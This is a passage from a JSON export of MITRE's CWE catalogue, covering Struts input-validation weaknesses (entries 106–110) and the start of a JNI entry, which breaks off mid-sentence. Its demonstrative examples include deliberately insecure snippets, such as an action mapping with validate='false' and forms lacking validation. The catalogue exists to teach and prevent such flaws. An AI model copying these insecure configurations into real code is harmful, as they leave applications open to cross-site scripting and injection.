Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Potential_Mitigations"}]}},"106":{"attr":{"@_ID":"106","@_Name":"Struts: Plug-in Framework not in Use","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"When an application does not use an input validation framework such as the Struts Validator, there is a greater risk of introducing weaknesses related to insufficient input validation.","Extended_Description":{"xhtml:p":["Unchecked input is the leading cause of vulnerabilities in J2EE applications. Unchecked input leads to cross-site scripting, process control, and SQL injection vulnerabilities, among others.","Although J2EE applications are not generally susceptible to memory corruption attacks, if a J2EE application interfaces with native code that does not perform array bounds checking, an attacker may be able to use an input validation mistake in the J2EE application to launch a buffer overflow attack."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1173","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"700","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Strategy":"Input Validation","Description":"Use an input validation framework such as Struts."},{"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":"Use an input validation framework such as Struts."},{"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":"Use the Struts Validator to validate all program input before it is processed by the application. Ensure that there are no holes in the configuration of the Struts Validator. Example uses of the validator include checking to ensure that:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Phone number fields contain only valid characters in phone numbers","Boolean values are only \\"T\\" or \\"F\\"","Free-form strings are of a reasonable length and composition"]}}}},{"Phase":"Implementation","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":"Use the Struts Validator to validate all program input before it is processed by the application. Ensure that there are no holes in the configuration of the Struts Validator. Example uses of the validator include checking to ensure that:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Phone number fields contain only valid characters in phone numbers","Boolean values are only \\"T\\" or \\"F\\"","Free-form strings are of a reasonable length and composition"]}}}}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the following Java example the class RegistrationForm is a Struts framework ActionForm Bean that will maintain user input data from a registration webpage for an online business site. The user will enter registration data and, through the Struts framework, the RegistrationForm bean will maintain the user data.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class RegistrationForm extends org.apache.struts.action.ActionForm {}","xhtml:div":{"#text":"private String name;private String email;...public RegistrationForm() {}...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","","","","","",""],"xhtml:i":["// private variables for registration form","// getter and setter methods for private variables"],"xhtml:div":{"#text":"super();","attr":{"@_style":"margin-left:10px;"}}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public class RegistrationForm extends org.apache.struts.validator.ValidatorForm {}","xhtml:div":{"#text":"private String name;private String email;...public RegistrationForm() {}public ActionErrors validate(ActionMapping mapping, HttpServletRequest request) {...}...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","","","","","","","",""],"xhtml:i":["// private variables for registration form","// getter and setter methods for private variables"],"xhtml:div":{"#text":"super();","attr":{"@_style":"margin-left:10px;"}}}}},{"attr":{"@_Nature":"good","@_Language":"XML"},"xhtml:div":{"#text":"&lt;struts-config&gt;&lt;/struts-config&gt;","xhtml:div":{"#text":"&lt;form-beans&gt;&lt;/form-beans&gt;...&lt;!-- ========================= Validator plugin ================================= --&gt;&lt;plug-in className=\\"org.apache.struts.validator.ValidatorPlugIn\\"&gt;&lt;/plug-in&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","",""],"xhtml:div":[{"#text":"&lt;form-bean name=\\"RegistrationForm\\" type=\\"RegistrationForm\\"/&gt;","attr":{"@_style":"margin-left:10px;"}},{"#text":"&lt;set-property","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"property=\\"pathnames\\"value=\\"/WEB-INF/validator-rules.xml,/WEB-INF/validation.xml\\"/&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}]},"xhtml:br":""}}],"Body_Text":["However, the RegistrationForm class extends the Struts ActionForm class which does use the Struts validator plug-in to provide validator capabilities. In the following example, the RegistrationForm Java class extends the ValidatorForm and Struts configuration XML file, struts-config.xml, instructs the application to use the Struts validator plug-in.","The plug-in tag of the Struts configuration XML file includes the name of the validator plug-in to be used and includes a set-property tag to instruct the application to use the file, validator-rules.xml, for default validation rules and the file, validation.XML, for custom validation."]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Struts: Plug-in Framework Not In Use"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Potential_Mitigations"}]}},"107":{"attr":{"@_ID":"107","@_Name":"Struts: Unused Validation Form","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"An unused validation form indicates that validation logic is not up-to-date.","Extended_Description":"It is easy for developers to forget to update validation logic when they remove or rename action form mappings. One indication that validation logic is not being properly maintained is the presence of an unused validation form.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"700","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Resultant"}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Quality Degradation"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Remove the unused Validation Form from the validation.xml file."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the following example the class RegistrationForm is a Struts framework ActionForm Bean that will maintain user input data from a registration webpage for an online business site. The user will enter registration data and, through the Struts framework, the RegistrationForm bean will maintain the user data in the form fields using the private member variables. The RegistrationForm class uses the Struts validation capability by extending the ValidatorForm class and including the validation for the form fields within the validator XML file, validator.xml.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class RegistrationForm extends org.apache.struts.validator.ValidatorForm {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"private String name;private String address;private String city;private String state;private String zipcode;private String email;public RegistrationForm() {}...","xhtml:br":["","","","","","","","","","","","","","",""],"xhtml:i":["// private variables for registration form","// no longer using the phone form field","// private String phone;","// getter and setter methods for private variables"],"xhtml:div":{"#text":"super();","attr":{"@_style":"margin-left:10px;"}}}}}},{"attr":{"@_Nature":"bad","@_Language":"XML"},"xhtml:div":{"#text":"&lt;form-validation&gt;&lt;/form-validation&gt;","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"&lt;formset&gt;&lt;/formset&gt;","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"&lt;form name=\\"RegistrationForm\\"&gt;&lt;/form&gt;","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"&lt;field property=\\"name\\" depends=\\"required\\"&gt;&lt;/field&gt;&lt;field property=\\"address\\" depends=\\"required\\"&gt;&lt;/field&gt;&lt;field property=\\"city\\" depends=\\"required\\"&gt;&lt;/field&gt;&lt;field property=\\"state\\" depends=\\"required,mask\\"&gt;&lt;/field&gt;&lt;field property=\\"zipcode\\" depends=\\"required,mask\\"&gt;&lt;/field&gt;&lt;field property=\\"phone\\" depends=\\"required,mask\\"&gt;&lt;/field&gt;&lt;field property=\\"email\\" depends=\\"required,email\\"&gt;&lt;/field&gt;","xhtml:div":[{"#text":"&lt;arg position=\\"0\\" key=\\"prompt.name\\"/&gt;","attr":{"@_style":"margin-left:10px;"}},{"#text":"&lt;arg position=\\"0\\" key=\\"prompt.address\\"/&gt;","attr":{"@_style":"margin-left:10px;"}},{"#text":"&lt;arg position=\\"0\\" key=\\"prompt.city\\"/&gt;","attr":{"@_style":"margin-left:10px;"}},{"#text":"&lt;arg position=\\"0\\" key=\\"prompt.state\\"/&gt;&lt;var&gt;&lt;/var&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"&lt;var-name&gt;mask&lt;/var-name&gt;&lt;var-value&gt;[a-zA-Z]{2}&lt;/var-value&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}},{"#text":"&lt;arg position=\\"0\\" key=\\"prompt.zipcode\\"/&gt;&lt;var&gt;&lt;/var&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"&lt;var-name&gt;mask&lt;/var-name&gt;&lt;var-value&gt;\\\\d{5}&lt;/var-value&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}},{"#text":"&lt;arg position=\\"0\\" key=\\"prompt.phone\\"/&gt;&lt;var&gt;&lt;/var&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"&lt;var-name&gt;mask&lt;/var-name&gt;&lt;var-value&gt;^([0-9]{3})(-)([0-9]{4}|[0-9]{4})$&lt;/var-value&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}},{"#text":"&lt;arg position=\\"0\\" key=\\"prompt.email\\"/&gt;","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":["","","","","",""]}}}}}}}}],"Body_Text":["However, the validator XML file, validator.xml, for the RegistrationForm class includes the validation form for the user input form field \\"phone\\" that is no longer used by the input form and the RegistrationForm class. Any validation forms that are no longer required should be removed from the validator XML file, validator.xml.","The existence of unused forms may be an indication to attackers that this code is out of date or poorly maintained."]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Struts: Unused Validation Form"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}]}},"108":{"attr":{"@_ID":"108","@_Name":"Struts: Unvalidated Action Form","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Every Action Form must have a corresponding validation form.","Extended_Description":"If a Struts Action Form Mapping specifies a form, it must have a validation form defined under the Struts Validator.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1173","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"700","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":[{"Scope":"Other","Impact":"Other","Note":"If an action form mapping does not have a validation form defined, it may be vulnerable to a number of attacks that rely on unchecked input. Unchecked input is the root cause of some of today\'s worst and most common software security problems. Cross-site scripting, SQL injection, and process control vulnerabilities all stem from incomplete or absent input validation."},{"Scope":["Confidentiality","Integrity","Availability","Other"],"Impact":"Other","Note":"Although J2EE applications are not generally susceptible to memory corruption attacks, if a J2EE application interfaces with native code that does not perform array bounds checking, an attacker may be able to use an input validation mistake in the J2EE application to launch a buffer overflow attack."}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Map every Action Form to a corresponding validation form.","An action or a form may perform validation in other ways, but the Struts Validator provides an excellent way to verify that all input receives at least a basic level of validation. Without this approach, it is difficult, and often impossible, to establish with a high level of confidence that all input is validated."]}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Struts: Unvalidated Action Form"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Common_Consequences, Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Common_Consequences, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}]}},"109":{"attr":{"@_ID":"109","@_Name":"Struts: Validator Turned Off","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"Automatic filtering via a Struts bean has been turned off, which disables the Struts Validator and custom validation logic. This exposes the application to other weaknesses related to insufficient input validation.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1173","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"700","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Ensure that an action form mapping enables validation. Set the validate field to true."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This mapping defines an action for a download form:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"XML"},"xhtml:div":{"#text":"&lt;action path=\\"/download\\"type=\\"com.website.d2.action.DownloadAction\\"name=\\"downloadForm\\"scope=\\"request\\"input=\\".download\\"validate=\\"false\\"&gt;&lt;/action&gt;","xhtml:br":["","","","","",""]}},"Body_Text":"This mapping has disabled validation. Disabling validation exposes this action to numerous types of attacks."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Struts: Validator Turned Off"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Notes":{"Note":{"#text":"The Action Form mapping in the demonstrative example disables the form\'s validate() method. The Struts bean: write tag automatically encodes special HTML characters, replacing a &lt; with \\"&amp;lt;\\" and a &gt; with \\"&amp;gt;\\". This action can be disabled by specifying filter=\\"false\\" as an attribute of the tag to disable specified JSP pages. However, being disabled makes these pages susceptible to cross-site scripting attacks. An attacker may be able to insert malicious scripts as user input to write to these JSP pages.","attr":{"@_Type":"Other"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}]}},"110":{"attr":{"@_ID":"110","@_Name":"Struts: Validator Without Form Field","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"Validation fields that do not appear in forms they are associated with indicate that the validation logic is out of date.","Extended_Description":{"xhtml:p":["It is easy for developers to forget to update validation logic when they make changes to an ActionForm class. One indication that validation logic is not being properly maintained is inconsistencies between the action form and the validation form.","Although J2EE applications are not generally susceptible to memory corruption attacks, if a J2EE application interfaces with native code that does not perform array bounds checking, an attacker may be able to use an input validation mistake in the J2EE application to launch a buffer overflow attack."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"700","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Other","Note":"It is critically important that validation logic be maintained and kept in sync with the rest of the application. Unchecked input is the root cause of some of today\'s worst and most common software security problems. Cross-site scripting, SQL injection, and process control vulnerabilities all stem from incomplete or absent input validation."}},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Static Analysis","Description":"To find the issue in the implementation, manual checks or automated static analysis could be applied to the XML configuration files.","Effectiveness":"Moderate"},{"Method":"Manual Static Analysis","Description":"To find the issue in the implementation, manual checks or automated static analysis could be applied to the XML configuration files.","Effectiveness":"Moderate"}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This example shows an inconsistency between an action form and a validation form. with a third field.","Body_Text":["This first block of code shows an action form that has two fields, startDate and endDate.","This second block of related code shows a validation form with a third field: scale. The presence of the third field suggests that DateRangeForm was modified without taking validation into account."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class DateRangeForm extends ValidatorForm {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"String startDate, endDate;public void setStartDate(String startDate) {}public void setEndDate(String endDate) {}","xhtml:br":["","","",""],"xhtml:div":[{"#text":"this.startDate = startDate;","attr":{"@_style":"margin-left:10px;"}},{"#text":"this.endDate = endDate;","attr":{"@_style":"margin-left:10px;"}}]}}}},{"attr":{"@_Nature":"bad","@_Language":"XML"},"xhtml:div":{"#text":"&lt;form name=\\"DateRangeForm\\"&gt;&lt;/form&gt;","xhtml:div":{"#text":"&lt;field property=\\"startDate\\" depends=\\"date\\"&gt;&lt;/field&gt;&lt;field property=\\"endDate\\" depends=\\"date\\"&gt;&lt;/field&gt;&lt;field property=\\"scale\\" depends=\\"integer\\"&gt;&lt;/field&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"&lt;arg0 key=\\"start.date\\"/&gt;","attr":{"@_style":"margin-left:10px;"}},{"#text":"&lt;arg0 key=\\"end.date\\"/&gt;","attr":{"@_style":"margin-left:10px;"}},{"#text":"&lt;arg0 key=\\"range.scale\\"/&gt;","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":["",""]}}}]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Struts: Validator Without Form Field"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Common_Consequences, Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Demonstrative_Examples, Detection_Factors, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}]}},"111":{"attr":{"@_ID":"111","@_Name":"Direct Use of Unsafe JNI","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"When a Java application uses the Java Native Interface (JNI) to call code written in another programming language, it can expose the application to weaknesses in that code, even if those weaknesses cannot occur in Java.","Extended_Description":"Many safety features that programmers may take for granted do not apply for native code, so you must carefully review all such code for potential problems. The languages used to implement native code may be more susceptible to buffer overflows and other attacks. Native code is unprotected by the security features enforced by the runtime environment, such as strong typing and array bounds 